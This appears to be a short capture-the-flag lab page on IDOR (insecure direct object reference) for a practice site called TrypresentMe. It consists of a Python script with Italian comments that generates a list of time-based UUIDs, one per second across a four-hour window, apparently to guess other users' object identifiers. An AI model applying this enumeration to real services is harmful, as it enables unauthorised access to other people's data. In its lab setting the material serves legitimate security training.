IDOR - Santa’s Little IDOR
Learn about IDOR while helping pentest the TrypresentMe website.
Script for UUID generation
import uuid
from datetime import datetime, timezone
def uuid_timestamp_to_datetime(uuid_obj):
"""Converte il timestamp UUID in datetime"""
timestamp = uuid_obj.time
# UUID timestamp: 100-nanosecond intervals dal 15 ottobre 1582
epoch_offset = 122192928000000000 # offset tra epoch Unix e UUID
unix_timestamp = (timestamp - epoch_offset) / 10000000
return datetime.fromtimestamp(unix_timestamp, tz=timezone.utc)
def datetime_to_uuid_timestamp(dt):
"""Converte datetime in timestamp UUID"""
epoch_offset = 122192928000000000
unix_timestamp = dt.timestamp()
return int(unix_timestamp * 10000000) + epoch_offset
def generate_uuid_with_timestamp(target_datetime, node=None, clock_seq=None):
"""Genera UUID v1 con timestamp specifico"""
timestamp = datetime_to_uuid_timestamp(target_datetime)
# Estrai i componenti del timestamp UUID
time_low = timestamp & 0xffffffff
time_mid = (timestamp >> 32) & 0xffff
time_hi_version = ((timestamp >> 48) & 0x0fff) | 0x1000 # Version 1
# Usa i valori dell'UUID originale se non specificati
if node is None:
node = 0x026ccdf7d769 # Nodo dall'UUID di esempio
if clock_seq is None:
clock_seq = 0x2c99 # Clock sequence dall'UUID di esempio
clock_seq_low = clock_seq & 0xff
clock_seq_hi_variant = ((clock_seq >> 8) & 0x3f) | 0x80 # Variant RFC 4122
# Costruisci l'UUID
uuid_int = (time_low << 96) | (time_mid << 80) | (time_hi_version << 64) | \
(clock_seq_hi_variant << 56) | (clock_seq_low << 48) | node
return uuid.UUID(int=uuid_int)
# Parametri
start_date = datetime(2025, 11, 20, 20, 0, 0, tzinfo=timezone.utc)
end_date = datetime(2025, 11, 20, 23, 59, 59, 999999, tzinfo=timezone.utc)
# Calcola il numero di UUID da generare (uno per secondo)
seconds_in_range = int((end_date - start_date).total_seconds()) + 1
print(f"Generazione di {seconds_in_range} UUID...")
print(f"Periodo: {start_date} - {end_date}")
# Genera gli UUID
uuids = []
for i in range(seconds_in_range):
current_time = datetime.fromtimestamp(
start_date.timestamp() + i,
tz=timezone.utc
)
generated_uuid = generate_uuid_with_timestamp(current_time)
uuids.append(str(generated_uuid))
# Salva su file
with open('UUIDs.txt', 'w') as f:
for u in uuids:
f.write(u + '\n')
print(f"✓ {len(uuids)} UUID salvati in 'UUIDs.txt'")
print(f"\nPrimi 5 UUID generati:")
for i in range(min(5, len(uuids))):
print(f" {uuids[i]}")
print(f"\nUltimi 5 UUID generati:")
for i in range(max(0, len(uuids)-5), len(uuids)):
print(f" {uuids[i]}")Last updated